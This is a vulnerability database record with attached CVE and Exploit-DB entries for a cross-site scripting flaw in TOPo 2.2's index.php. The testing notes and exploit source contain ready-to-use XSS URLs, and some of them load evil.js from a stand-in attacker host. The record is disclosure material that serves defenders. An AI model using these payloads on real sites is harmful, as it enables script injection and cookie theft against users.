ID OSVDB:16699 Type osvdb Reporter Lostmon Lords(Lostmon@gmail.com) Modified 2005-05-20T04:29:52
Description
Vulnerability Description
TOPo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'm', 's', 'ID', and 't' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
TOPo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'm', 's', 'ID', and 't' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
{"type": "osvdb", "published": "2005-05-20T04:29:52", "href": "https://vulners.com/osvdb/OSVDB:16699", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "viewCount": 1, "edition": 1, "reporter": "Lostmon Lords(Lostmon@gmail.com)", "title": "TOPo index.php Multiple Variable XSS", "affectedSoftware": [{"operator": "eq", "version": "2.2", "name": "TOPo"}, {"operator": "eq", "version": "2.2.178", "name": "TOPo"}], "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2017-04-28T13:20:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1715"]}, {"type": "exploitdb", "idList": ["EDB-ID:25689"]}], "modified": "2017-04-28T13:20:12", "rev": 2}, "vulnersScore": 4.9}, "references": [], "id": "OSVDB:16699", "lastseen": "2017-04-28T13:20:12", "cvelist": ["CVE-2005-1715"], "modified": "2005-05-20T04:29:52", "description": "## Vulnerability Description\nTOPo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'm', 's', 'ID', and 't' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTOPo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'm', 's', 'ID', and 't' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/topo/index.php?m=top\"><SCRIPT%20src=http://[attacker]/evil.js></script>&s=info&ID=1114815037.2498 \nhttp://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552\"><SCRIPT%20src=http://[attacker]/evil.js></SCRIPT>&t=puntuar\nhttp://[victim]/topo/index.php?m=top&s=info\"><script>alert()</script>&ID=1115946293.3552&t=puntuar\nhttp://[victim]/topo/index.php?m=top\"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar\nhttp://[victim]/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498\"><SCRIPT%20src=http://[attacker]/evil.js></script>\nhttp://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598\"><SCRIPT%20src=http://[attacker]/evil.js></script>\nhttp://[victim]/topo/index.php?m=members&s=html&t=edit\"><SCRIPT%20src=http://[attacker]/evil.js></script> \n\nhttp://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552\n(name, web, and email field)\n## References:\nVendor URL: http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info\nSecurity Tracker: 1014016\n[Secunia Advisory ID:15325](https://secuniaresearch.flexerasoftware.com/advisories/15325/)\n[Related OSVDB ID: 16700](https://vulners.com/osvdb/OSVDB:16700)\nOther Advisory URL: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html\n[CVE-2005-1715](https://vulners.com/cve/CVE-2005-1715)\nBugtraq ID: 13700\nBugtraq ID: 13701\n"}
{"cve": [{"lastseen": "2020-10-03T11:34:54", "description": "Cross-site scripting (XSS) vulnerability in index.php for TOPo 2.2 (2.2.178) allows remote attackers to inject arbitrary web script or HTML via the (1) m, (2) s, (3) ID, or (4) t parameters, or the (5) field name, (6) Your Web field, or (7) email field in the comments section.", "edition": 3, "cvss3": {}, "published": "2005-05-24T04:00:00", "title": "CVE-2005-1715", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1715"], "modified": "2008-09-05T20:49:00", "cpe": ["cpe:/a:ej3:topo:2.2", "cpe:/a:ej3:topo:2.2.178"], "id": "CVE-2005-1715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1715", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ej3:topo:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ej3:topo:2.2.178:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T01:56:55", "description": "EJ3 TOPo 2.2 Multiple Index.PHP Cross-Site Scripting Vulnerabilities. CVE-2005-1715. Webapps exploit for php platform", "published": "2003-05-20T00:00:00", "type": "exploitdb", "title": "EJ3 TOPo 2.2 - Multiple Index.PHP Cross-Site Scripting Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1715"], "modified": "2003-05-20T00:00:00", "id": "EDB-ID:25689", "href": "https://www.exploit-db.com/exploits/25689/", "sourceData": "source: http://www.securityfocus.com/bid/13700/info\r\n\r\nTOPo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. \r\n\r\nhttp://www.example.com/topo/index.php?m=top\"><SCRIPT>alert()</script>&s=info&ID=1114815037.2498\r\nhttp://www.example.com/topo/index.php?m=top&s=info&ID=1115946293.3552\"><SCRIPT>alert()</SCRIPT>&t=puntuar\r\nhttp://www.example.com/topo/index.php?m=top&s=info\"><script>alert()</script>&ID=1115946293.3552&t=puntuar\r\nhttp://www.example.com/topo/index.php?m=top\"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar\r\nhttp://www.example.com/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498\"><SCRIPT>alert()</script>\r\nhttp://www.example.com/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598\"><SCRIPT>alert()</script>\r\nhttp://www.example.com/topo/index.php?m=members&s=html&t=edit\"><SCRIPT>alert()</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/25689/"}]}
